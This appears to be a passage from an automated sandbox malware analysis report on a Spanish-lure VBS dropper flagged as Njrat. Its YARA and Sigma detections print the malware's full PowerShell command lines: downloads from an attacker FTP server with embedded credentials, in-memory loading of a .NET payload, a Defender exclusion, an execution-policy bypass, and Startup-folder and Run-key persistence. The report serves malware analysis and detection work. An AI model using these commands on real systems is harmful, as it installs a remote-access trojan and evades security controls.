23.2.powershell.exe.20958f44b38.1.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
20.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
12.2.powershell.exe.20a2a7dbe00.1.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
18.2.powershell.exe.2078fd84ec0.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
23.2.powershell.exe.20958f407d8.2.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
4.2.powershell.exe.1d3930c6538.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.powershell.exe.1d3944eae80.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.powershell.exe.20a2a7d7a88.0.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
12.2.powershell.exe.20a2a7d7a88.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
18.2.powershell.exe.2078fd80b60.1.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
18.2.powershell.exe.2078fd80b60.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.powershell.exe.20a2a7dbe00.1.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
12.2.powershell.exe.20a2a7dbe00.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
18.2.powershell.exe.2078fd84ec0.0.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
18.2.powershell.exe.2078fd84ec0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Click to see the 11 entries

Other

Source	Rule	Description	Author	Strings
amsi64_1088.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1088, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 6524, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", CommandLine|base64offset|contains: b~'r*', Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", ProcessId: 4956, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", CommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1088, ParentProcessName: powershell.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", ProcessId: 5436, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_nyj

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman

Sigma detected: PowerShell Script Run in AppData

Source: Process started

Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit, CommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit, ProcessId: 7368, ProcessName: cmd.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + 